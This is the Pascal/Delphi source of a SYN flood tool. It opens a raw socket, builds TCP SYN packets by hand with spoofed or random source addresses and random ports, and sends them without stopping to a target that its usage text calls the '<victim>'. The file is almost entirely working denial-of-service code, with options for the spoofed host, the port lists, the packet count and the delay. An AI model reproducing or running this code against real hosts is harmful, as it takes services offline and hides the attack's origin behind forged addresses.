unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TPorts = array of Word;
  TSynOptions = packed record
    Delay: Cardinal;
    DstPorts: TPorts;
    HedefAdres: TSockAddrIn;
    Num: Cardinal;
    RandomSeek: Integer;
    Sended: Cardinal;
    Socket: TSocket;
    SpoofIP: Cardinal;
    SrcPorts: TPorts;
  end;

var
  SynOpt: TSynOptions;

  function GetPorts(Ports: string): TPorts;
  function GetRandomIP: Cardinal;
  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer;
    var addrto: TSockAddr; tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  function ValidPort(const Port: string): Boolean;
  procedure CreateSocket;
  procedure SendSyn(const sport, dport: Word);
  procedure SendSyn_FillIPhdr;
  procedure SendSyn_FillTCPhdr(const sport, dport: Word);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetPorts(Ports: string): TPorts; // function for creating port array
  procedure AddPort(const Port: string);
  begin
    if ValidPort(Port) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := StrtoInt(Port);
    end
    else
      Writeln('Skipping invalid port: ' + Port);
  end;
var
  i: Integer;
  S: string;
begin
  i := Pos(',', Ports);
  while i > 0 do // while ',' exists on ports string
  begin
    S := Copy(Ports, 1, i - 1); // copy until the position of ','
    AddPort(S); // and add it to port array
    Delete(Ports, 1, i); // delete until ',' (includes ',')
    i := Pos(',', Ports); // look for if there is another ','
  end;
  AddPort(Ports); // finally add the last port
end;

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                             // values between very short times
  Random;
  Inc(SynOpt.RandomSeek);
  Result := (Random(High(Integer)) + SynOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; // function for sending packet and for checking send error
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); // send packet
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send syn packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

function ValidPort(const Port: string): Boolean; // function for checking a port
var
  prt: Integer;
begin
  prt := StrtoIntDef(Port, -1);
  Result := (prt > -1) and (prt < 65536); // a valid port must be between -1 and 65536
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if SynOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SynOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 40;
  
var
  Buf: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr = @Buf[0];
  TCPhdr: PTCPhdr = @Buf[20];

procedure SendSyn(const sport, dport: Word); // procedure for building syn packet
begin
  FillChar(Buf, Len, 0); // fill whole datagram with zeros first
  SendSyn_FillIPhdr; // build ip header
  SendSyn_FillTCPhdr(sport, dport); // build tcp header
  Gonder(SynOpt.Socket, Buf, Len, 0, SynOpt.HedefAdres,
         Sizeof(SynOpt.HedefAdres)); // and send the packet
end;

procedure SendSyn_FillIPhdr; // procedure for building the ip header
begin
  IPhdr.ip_verlen := $45; // ip version and ip header length
  IPhdr.ip_tos := 60; // we set type of service to 60 (00111100) for a high priority
  IPhdr.ip_len := htons(Len); // size of whole datagram
  IPhdr.ip_id := htons(GetRandomValue(65535) + 1); // packet ident
  IPhdr.ip_ttl := 255; // time to live
  IPhdr.ip_p := 6; // protocol 6 = TCP
  if SynOpt.SpoofIP = 0 then // source ip. get a random one if that is 0
    IPhdr.ip_src := GetRandomIP
  else
    IPhdr.ip_src := SynOpt.SpoofIP;
  IPhdr.ip_dst := SynOpt.HedefAdres.sin_addr.S_addr; // destination ip
  IPhdr.ip_sum := CheckSum(@IPhdr^, 20); // ip header sum. we must calculate it lastly
end;

var
  SeudoBuf: array [0..31{magic value}] of Char;

procedure SendSyn_FillTCPhdr(const sport, dport: Word); // procedure for building the tcp header
var
  PSeudohdr: Ppseudohdr_tcp;
begin
  if sport = 0 then // get a random source port if that is 0
    TCPhdr.tcp_src := htons(GetRandomValue(65535) + 1)
  else
    TCPhdr.tcp_src := htons(sport);
  if dport = 0 then // get a random destination port if that is 0
    TCPhdr.tcp_dst := htons(GetRandomValue(65535) + 1)
  else
    TCPhdr.tcp_dst := htons(dport);
  TCPhdr.tcp_seq := htonl(GetRandomValue(High(integer)) + 1);
  TCPhdr.tcp_ack := htonl(GetRandomValue(High(integer)) + 1);
  TCPhdr.tcp_flags := $02; // 0x02 = syn flag
  TCPhdr.tcp_win := htons(GetRandomValue(65535) + 1);
  TCPhdr.tcp_urp := htons(GetRandomValue(65535) + 1);
  FillChar(SeudoBuf, Sizeof(SeudoBuf), 0);
  PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum
  PSeudohdr.saddr := IPhdr.ip_src;        // we must calculate it with a pseudo header
  PSeudohdr.daddr := IPhdr.ip_dst;
  PSeudohdr.protocol := 6;
  PSeudohdr.length := htons(20);
  PSeudohdr.tcphdr := TCPhdr^;
  TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);
  SynOpt.HedefAdres.sin_port := TCPhdr.tcp_dst;
end;

procedure SetDefaultOptions; // set default values of global variables
begin
  SynOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SetLength(SynOpt.DstPorts, 1);
  SynOpt.DstPorts[0] := 0;
  SynOpt.HedefAdres.sin_family := AF_INET;
  SynOpt.HedefAdres.sin_port := htons(GetRandomValue(High(Word)) + 1);
  SetLength(SynOpt.SrcPorts, 1);
  SynOpt.SrcPorts[0] := 0;
end;

procedure SetParams; // procedure for setting optional parameters
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then Continue;
    case Ch of
      'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1))); // source ip parameter
      'p': // parameter for destination ports
        begin
          SynOpt.DstPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.DstPorts) = 0 then // if there is no dst ports then exit
          begin
            Writeln('No valid ports found on the dst port list');
            Halt(0);
          end;
        end;
      's': // parameter for source ports
        begin
          SynOpt.SrcPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.SrcPorts) = 0 then // if there is no src ports then exit
          begin
            Writeln('No valid ports found on the src port list');
            Halt(0);
          end;
        end;
      'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0); // parameter for packet count
      'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0); // parameter for packet delay
    end;
  end;
end;

procedure Usage(const Path: string); // program usage
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -S:    Spoof host                         (0 is random (default))'#13#10 +
        '  -p:    Comma separated list of dest ports (0 is random (default))'#13#10 +
        '  -s:    Comma separated list of src ports  (0 is random (default))'#13#10 +
        '  -n:    Num of packets                     (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)                      (default 0)'#13#10
       );
  Halt(0);
end;

end.
